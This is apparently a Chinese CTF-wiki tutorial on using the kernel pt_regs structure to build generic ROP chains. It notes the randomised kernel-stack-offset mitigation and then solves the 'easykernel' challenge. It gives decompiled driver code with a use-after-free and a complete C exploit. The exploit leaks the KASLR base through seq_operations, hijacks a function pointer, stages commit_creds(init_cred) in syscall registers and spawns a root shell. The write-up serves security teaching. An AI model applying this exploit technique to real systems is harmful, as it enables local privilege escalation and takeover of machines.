跳转至

利用 pt_regs 構造通用內核 ROP

系統調用 與 pt_regs 結構體

系統調用的本質是什麼?或許不少人都能夠答得上來是由我們在用戶態佈置好相應的參數後執行 syscall 這一彙編指令,通過門結構進入到內核中的 entry_SYSCALL_64這一函數,隨後通過系統調用表跳轉到對應的函數。

現在讓我們將目光放到 entry_SYSCALL_64 這一用匯編寫的函數內部,注意到當程序進入到內核太時,該函數會將所有的寄存器壓入內核棧上,形成一個 pt_regs 結構體,該結構體實質上位於內核棧底,定義如下:

struct pt_regs {
/*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */
    unsigned long r15;
    unsigned long r14;
    unsigned long r13;
    unsigned long r12;
    unsigned long rbp;
    unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
    unsigned long r11;
    unsigned long r10;
    unsigned long r9;
    unsigned long r8;
    unsigned long rax;
    unsigned long rcx;
    unsigned long rdx;
    unsigned long rsi;
    unsigned long rdi;
/*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
 * On hw interrupt, it's IRQ number:
 */
    unsigned long orig_rax;
/* Return frame for iretq */
    unsigned long rip;
    unsigned long cs;
    unsigned long eflags;
    unsigned long rsp;
    unsigned long ss;
/* top of stack page */
};

內核棧 與通用 ROP

我們都知道,內核棧只有一個頁面的大小,而 pt_regs 結構體則固定位於內核棧棧底,當我們劫持內核結構體中的某個函數指針時(例如 seq_operations->start),在我們通過該函數指針劫持內核執行流時 rsp 與 棧底的相對偏移通常是不變的

而在系統調用當中過程有很多的寄存器其實是不一定能用上的,比如 r8 ~ r15,這些寄存器爲我們佈置 ROP 鏈提供了可能,我們不難想到:

  • 只需要尋找到一條形如 "add rsp, val ; ret" 的 gadget 便能夠完成 ROP

這裏筆者給出一個通用的 ROP 板子,方便調試時觀察:

    __asm__(
        "mov r15,   0xbeefdead;"
        "mov r14,   0x11111111;"
        "mov r13,   0x22222222;"
        "mov r12,   0x33333333;"
        "mov rbp,   0x44444444;"
        "mov rbx,   0x55555555;"
        "mov r11,   0x66666666;"
        "mov r10,   0x77777777;"
        "mov r9,    0x88888888;"
        "mov r8,    0x99999999;"
        "xor rax,   rax;"
        "mov rcx,   0xaaaaaaaa;"
        "mov rdx,   8;"
        "mov rsi,   rsp;"
        "mov rdi,   seq_fd;"        // 這裏假定通過 seq_operations->stat 來觸發
        "syscall"
    );

新版本內核對抗利用 pt_regs 進行攻擊的辦法

正所謂魔高一尺道高一丈,內核主線在 這個 commit 中爲系統調用棧添加了一個偏移值,這意味着 pt_regs 與我們觸發劫持內核執行流時的棧間偏移值不再是固定值

diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
index 4efd39aacb9f2..7b2542b13ebd9 100644
--- a/arch/x86/entry/common.c
+++ b/arch/x86/entry/common.c
@@ -38,6 +38,7 @@
 #ifdef CONFIG_X86_64
 __visible noinstr void do_syscall_64(unsigned long nr, struct pt_regs *regs)
 {
+    add_random_kstack_offset();
     nr = syscall_enter_from_user_mode(regs, nr);

     instrumentation_begin();

當然,若是在這個隨機偏移值較小且我們仍有足夠多的寄存器可用的情況下,仍然可以通過佈置一些 slide gadget 來繼續完成利用,不過穩定性也大幅下降了。

例題:西湖論劍2021線上初賽 - easykernel

分析

首先查看啓動腳本,可以發現開啓了 SMEP 和 KASLR:

#!/bin/sh

qemu-system-x86_64  \
-m 64M \
-cpu kvm64,+smep \
-kernel ./bzImage \
-initrd rootfs.img \
-nographic \
-s \
-append "console=ttyS0 kaslr quiet noapic"

進入題目環境,查看 /sys/devices/system/cpu/vulnerabilities/*,可以發現開啓了 PTI (頁表隔離):

/ $ cat /sys/devices/system/cpu/vulnerabilities/*
KVM: Mitigation: VMX unsupported
Mitigation: PTE Inversion
Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown
Mitigation: PTI
Vulnerable
Mitigation: usercopy/swapgs barriers and __user pointer sanitization
Mitigation: Full generic retpoline, STIBP: disabled, RSB filling
Not affected
Not affected

題目給了個 test.ko,拖入 IDA 進行分析,發現只定義了 ioctl,可以看出是常見的“菜單堆”題目,給出了分配、釋放、讀、寫 object 的功能。對於分配 object,我們需要傳入如下形式結構體:

struct
{
    size_t size;
    void *buf;
}

對於釋放、讀、寫 object,則需要傳入如下形式結構體:

struct 
{
    size_t idx;
    size_t size;
    void *buf;
};

分配:0x20

比較常規的 kmalloc,沒有限制size,最多可以分配 0x20 個 chunk:

 v7 = _kmalloc(v12, 3264LL);
  v8 = v7;
  if ( !v7 )
    return 0LL;
  v9 = v12;
  v10 = v13;
  if ( v12 > 0x7FFFFFFF )
    goto LABEL_29;
  _check_object_size(v7, v12, 0LL);
  v11 = copy_from_user(v8, v10, v9);
  if ( v11 )
    return 0LL;
  while ( addrList[v11] )
  {
    if ( ++v11 == 32 )
      return 0LL;
  }
  addrList[(int)v11] = v8;
  return 0LL;
}

釋放:0x30

kfree 以後沒有清空指針,直接就有一個裸的 UAF 糊臉

  if ( a2 != 32 )
  {
    if ( a2 != 48 )
      return result;
    if ( !copy_from_user(&v12, v2, 8LL) )
    {
      if ( (unsigned int)v12 <= 0x20 )
      {
        if ( addrList[(unsigned int)v12] )
          kfree();
      }
      return 0LL;
    }
    return -22LL;
  }

讀:0x40

會調用 show 函數:

  if ( a2 == 64 )
  {
    if ( !copy_from_user(&v12, v2, 24LL) )
    {
      show(&v12);
      return 0LL;
    }
    return -22LL;
  }

其實就是套了一層皮的讀 object 內容,加了 hardened usercopy 檢查:

__int64 __fastcall show(_QWORD *a1)
{
  const void *v1; // rsi
  unsigned __int64 v2; // r13
  __int64 v3; // r14
  _QWORD v5[37]; // [rsp-128h] [rbp-128h] BYREF

  _fentry__();
  v5[32] = __readgsqword(0x28u);
  v5[0] = 0LL;
  memset(&v5[1], 0, 0xF8uLL);
  if ( (unsigned int)*a1 > 0x20 )
    return 0xFFFFFFFFLL;
  v1 = (const void *)addrList[(unsigned int)*a1];
  if ( !v1 )
    return 0xFFFFFFFFLL;
  v2 = a1[1];
  v3 = a1[2];
  qmemcpy(v5, v1, 0x100uLL);
  if ( v2 > 0x100 )
  {
    _warn_printk("Buffer overflow detected (%d < %lu)!\n", 256LL, v2);
    BUG();
  }
  _check_object_size(v5, v2, 1LL);
  return copy_to_user(v3, v5, v2) != 0 ? 0xFFFFFFEA : 0;
}

寫:0x50

常規的寫入 object:

  if ( a2 > 0x40 )
  {
    if ( a2 == 80 )
    {
      if ( copy_from_user(&v12, v2, 24LL) )
        return -22LL;
      if ( (unsigned int)v12 <= 0x20 )
      {
        v4 = addrList[(unsigned int)v12];
        if ( v4 )
        {
          v5 = v13;
          v6 = v14;
          if ( v13 <= 0x7FFFFFFF )
          {
            _check_object_size(addrList[(unsigned int)v12], v13, 0LL);
            copy_from_user(v4, v6, v5);
            return 0LL;
          }
LABEL_29:
          BUG();
        }
      }
    }
    return 0LL;
  }

解法:UAF + seq_operations + pt_regs + ROP

題目沒有說明,那筆者默認應該是沒開 Hardened Freelist,現在又有 UAF,那麼解法就是多種多樣的了,筆者這裏選擇用 seq_operations + pt_regs 構造 ROP 進行提權:

exp 如下:

#include <fcntl.h>
#include <stddef.h>

#define COMMIT_CREDS 0xffffffff810c8d40
#define SEQ_OPS_0 0xffffffff81319d30
#define INIT_CRED 0xffffffff82663300
#define POP_RDI_RET 0xffffffff81089250
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81c00f30

long dev_fd;

struct op_chunk
{
    size_t  idx;
    size_t  size;
    void    *buf;
};

struct alloc_chunk
{
    size_t  size;
    void    *buf;
};

void readChunk(size_t idx, size_t size, void *buf)
{
    struct op_chunk op = 
    {
        .idx = idx,
        .size = size,
        .buf = buf,
    };
    ioctl(dev_fd, 0x40, &op);
}

void writeChunk(size_t idx, size_t size, void *buf)
{
    struct op_chunk op = 
    {
        .idx = idx,
        .size = size,
        .buf = buf,
    };
    ioctl(dev_fd, 0x50, &op);
}

void deleteChunk(size_t idx)
{
    struct op_chunk op = 
    {
        .idx = idx,
    };
    ioctl(dev_fd, 0x30, &op);
}

void allocChunk(size_t size, void *buf)
{
    struct alloc_chunk alloc = 
    {
        .size = size,
        .buf = buf,
    };
    ioctl(dev_fd, 0x20, &alloc);
}

size_t      buf[0x100];
size_t      swapgs_restore_regs_and_return_to_usermode;
size_t      init_cred;
size_t      pop_rdi_ret;
long        seq_fd;
void *      kernel_base = 0xffffffff81000000;
size_t      kernel_offset = 0;
size_t      commit_creds;
size_t      gadget;

int main(int argc, char ** argv, char ** envp)
{
    dev_fd = open("/dev/kerpwn", O_RDWR);

    allocChunk(0x20, buf);
    deleteChunk(0);
    seq_fd = open("/proc/self/stat", O_RDONLY);
    readChunk(0, 0x20, buf);

    kernel_offset = buf[0] - SEQ_OPS_0;
    kernel_base += kernel_offset;
    swapgs_restore_regs_and_return_to_usermode = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + kernel_offset;
    init_cred = INIT_CRED + kernel_offset;
    pop_rdi_ret = POP_RDI_RET + kernel_offset;
    commit_creds = COMMIT_CREDS + kernel_offset;
    gadget = 0xffffffff8135b0f6 + kernel_offset; // add rsp 一個數然後 pop 一堆寄存器最後ret,具體的不記得了,懶得再回去翻了

    buf[0] = gadget;
    swapgs_restore_regs_and_return_to_usermode += 9;
    writeChunk(0, 0x20, buf);

    __asm__(
        "mov r15, 0xbeefdead;"
        "mov r14, pop_rdi_ret;"
        "mov r13, init_cred;" // add rsp, 0x40 ; ret
        "mov r12, commit_creds;"
        "mov rbp, swapgs_restore_regs_and_return_to_usermode;"
        "mov rbx, 0x999999999;"
        "mov r11, 0x114514;"
        "mov r10, 0x666666666;"
        "mov r9, 0x1919114514;"
        "mov r8, 0xabcd1919810;"
        "xor rax, rax;"
        "mov rcx, 0x666666;"
        "mov rdx, 8;"
        "mov rsi, rsp;"
        "mov rdi, seq_fd;"
        "syscall"
    );

    system("/bin/sh");

    return 0;
}